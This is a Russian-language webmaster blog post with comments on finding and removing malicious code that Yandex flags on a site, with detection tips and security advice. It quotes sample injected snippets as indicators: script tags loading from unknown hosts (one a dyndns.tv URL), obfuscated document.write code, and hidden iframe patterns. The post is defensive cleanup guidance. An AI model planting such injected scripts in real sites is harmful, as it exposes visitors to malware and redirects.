Яндекс обнаружил вредоносный код, как его удалить?
Привет, дорогой читатель! Данный пост будет полезен не только новичкам, но и продвинутым вебмастерам, которые заботятся о безопасности своего проекта. Яндекс обнаружил вредоносный код, как его удалить - вот такую тему мы сегодня раскроем. Если даже ваш сайт или блог не был атакован спамерами и не «зацепил» в сети вредоносного кода или вируса, эта информация в любом случае не будет лишней. И так…
Из этого поста вы узнаете:
Что такое вредоносный код?
Такой вредоносный код обычно обнаруживает робот Яндекса и присылает владельцу проекта на e-mail(как было в моем случае) вот такое письмо. Картинки для увеличения, кликабельны:
Поверьте, такому сообщению не обрадуешься. Сразу бросаешься к браузеру, чтобы посмотреть, как выглядит ваше детище. Все браузеры отображают ваш сайт/блог, как обычный, но Мазила Фаерфокс показывает вот такое предупреждение:
Сами понимаете, что увидев такую информацию, любой нормальный пользователь постарается как можно быстрее покинуть эту страницу. Такие действия со стороны пользователей будут нормальными и правильными, а ваш ресурс при этом будет иметь резкое падение трафика. Вот после такого сообщения начинаешь задумываться, как это могло случиться, где мог просочиться этот вредоносный код. Но об этом думать уже поздно и полезней будет подумать, как от него избавиться и приступить как можно быстрее к необходимым действиям. Иначе поисковые системы могут расценить ваше бездействие, как ресурс «покинутый» или умышленно зараженный. С чего в первую очередь необходимо начать?
Выявление вредоносного кода
Как пишет сам Яндекс, чтобы найти вредоносный код, следует искать любой код, который не добавляли вы сами. Чтобы узнать более подробно, где находится вредоносный код, необходимо перейти на webmaster.yandex.ru/ua, открыть «мои сайты», там будет виден значок напротив вашего сайта, обозначающий вредоносный код:
Нажимаете на него, и вам откроются страницы, на которых, по утверждению Яндекса, может находиться злосчастный, зловредный, вредоносный код. В левой колонке расположена графа «Безопасность сайта», открыв которую вы можете найти ответы на часто задаваемые вопросы, выглядит она вот так:
В обязательном порядке замените данные входа на сайт, хостинг. Рекомендую внимательно почитать и посмотреть видео по этому вопросу. После этого вам будет проще понять и разобраться, где может находиться вредоносный код. Чаще всего это могут быть:
- теги <script>, которые содержат ссылки на неизвестные ресурсы (например, такие <script src="h__p://eval.com/1.js">;
- теги <script>, текст которых обфусцирован – зашифрован или запутан, например, так: <!-- o65 --> <script type="text/javascript"> document.write
('\u002c\u0087\u0044\u0032\u0054\u008f\u0042\u0011\u0068\u0092'); - скрипты, замаскированные под счетчики или баннерные системы, содержащие перед текстом комментарии о том, что это счетчик, но выполняющие непонятные действия или ссылающиеся на неизвестные вам сайты;
- теги <iframe>, <object>, <embed>, ссылающиеся на неизвестные вам страницы; особое внимание нужно обратить на теги, атрибуты которых установлены таким образом, чтобы тег был скрыт при просмотре страницы. Например: маленькие значения атрибутов width/height (0-10 пикселей); невидимость: position:absolute; display:none и т.д.;
- недопустимые элементы в контенте, размещенном пользователями (комментарии, статьи, посты на форуме): непонятные вставки кода, флеш-ролики, скрипты, теги <iframe>, <object>, <embed>;
- динамическое исполнение кода (eval, assert, create_function);
- загрузка удаленных ресурсов (file_get_contents, curl_exec);
- атрибуты expression в стилях страницы, содержащие неизвестный вам текст, наример: <img style="top: expression(....) !important" >.
Как указывает сам Яндекс, вредоносный код может быть любым не установленным лично вами кодом и такой код может располагаться в любом файле, но чаще всего его внедряют в файлы: header.php, pade.php, functions.php, или footer.php. Он может выглядеть вот таким образом (это один из примеров):
Удаление вредоносного кода
Чтобы начать поиск и удаление вредоносного кода в файлах, первым делом нужно сделать бекап файлов, с которыми вы будете работать. Затем нужно открыть страницу с вредоносным кодом, на которую указал Яндекс и, наведя на нее курсор, нажать правой кнопкой мыши и выбрать действие: «Просмотр кода элемента» или «Открыть исходный код страницы». Дальше вам откроется окно с кодом страницы, где вам необходимо искать подозрительный вредоносный код. Обнаружив его, вы будете иметь визуальное представление о том, как он выглядит, а затем переходите непосредственно к его поиску по файлам. Если код имеет зашифрованную функцию base64_encodeи строчка выглядит примерно вот так:
<script src="http://rfvvhynukm.dyndns.tv/showforum.php?pid=152"type="text/javascript"></script>
Такой код обычно располагается в самом верху исходного кода страницы и его задача - показать рекламу на вирусный или вредоносный сайт. Как расшифровать и удалить такой код - можно прочитать вот здесь.
Если вредоносный код имеет другую структуру, тогда запускаем FTP-клиент, заходим на сайт, открываем по очереди php-файлы (желательно в Notepad++) и начинаем искать в них вредоносный код с помощью поиска – нажав клавиши Ctril+F и прописав часть фрагмента в поисковое окно. Такой способ будет намного быстрее выявлять нужные элементы вредоносного кода. Найдя нужные функции кода, внимательно его изучаете и, по необходимости, удаляете его. Только не забывайте про копии (бекап) файлов.
После удаления вредоносного кода необходимо в обязательном порядке подать заявку на проверку вашего проекта в Яндекс.Вебмастере, кликнув кнопку «Перепроверить» в разделе «Безопасность сайта». И дождаться сообщения от робота Яндекс вот такого содержания:
Меры безопасности для вебмастера
Необходимые меры безопасности, о которых должен знать каждый вебмастер:
- Не нужно хранить пароли для входа в админ-панель ресурса и в ftp-клиент на компьютере, желательно при каждом входе данные вводить вручную.
- Как можно чаще меняйте логин и пароль для входа на ресурс и скрывайте от посторонних глаз.
- Не нужно использовать в пароле имена, даты, обычные фразы, их легче всего взломать.
- Не работайте в панели управления ресурса и не запускайте ftp-соединение с выключенным или не установленным антивирусом.
- Устанавливайте только проверенные на надежность коды. Проверяйте, куда ведут данные ссылки с таких кодов.
- Обновляйте вовремя CMS проекта из надежных и проверенных источников.
- Проверяйте свой проект на наличие вредоносного кода в специальных сервисах. Более подробную информацию о них можете узнать вот здесь.
Дорогой читатель, если вам не удалось вылечить свой проект собственноручно, тогда рекомендую обратиться за помощью к специалистам-фрилансерам (за деньги) или обратитесь за помощью к своему хостеру, это, на мой взгляд, самый лучший вариант. Советую не затягивать с этой процедурой, иначе поисковые системы не упустят момента, чтобы закинуть вас, как можно подальше в поисковых запросах. Помните – Яндекс ждет от вас активных действий! Если что не понятно или есть вопросы, пишите в комментариях. Постараюсь помочь.
Сегодня предлагаю очередную загадку с подвохом, попробуйте, отгадайте:
Самый известный полупроводник
На этом сегодня вся информация, надеюсь, то, что вы узнали, поможет разобраться с проблемой вредоносного кода. Удачи в работе и пока, пока.
С Уважением, Геннадий Ольховский
Интересное в блоге:
Рекомендую статьи по теме:
Не получилось поймать? Не беда - начните сначала!

Спасибо большое за такую подробную инструкцию! Поставила ее в закладки, мало ли что. Я сразу начинаю паниковать, но теперь буду немножко спокойнее и сразу при случае буду действовать в нужном направлении.
[Ответить]
Геннадий Ольховский Reply:
Октябрь 31st, 2014 at 13:19
Лара, пользуйтесь на здоровье
Паника в таких случаях плохой помощник, но это естественное чувство. Если не дай бог такое случается, и вы не в силах что-то сделать в ближайшее время, тогда лучше обратиться к хостеру (провайдеру хостинга), они должны помочь.
[Ответить]
Недавно в статистике своего сайта магазина обнаружил весьма подозрительный запрос. Мне посоветовали проверить сайт скриптом Айболита. Очень серьезная проверка. Хотя вирусов не кто не обнаруживал, все же для успокоения, через хостинг проверил сайт этим скриптом. К счастью все оказалось чисто, зато нашел много лишнего. Почистил и освободил 0,3 GB места.
Считаю что безопасность ресурса должна быть на первом месте.
[Ответить]
Геннадий Ольховский Reply:
Ноябрь 5th, 2014 at 17:06
Я с Вами совершенно согласен. Безопасность детища, то что ты создал — это серьезные вещи. Один раз упустишь, потом восстанавливаться ОЙ как тяжело… Знаю с личного опыта, и это уже не первый раз. Как только тебя заметят (конкуренты или еще кто), жди плохих сюрпризов. К примеру у меня упал Тиц и первые места в ТОПе тоже упали. Но ничего жить будет
[Ответить]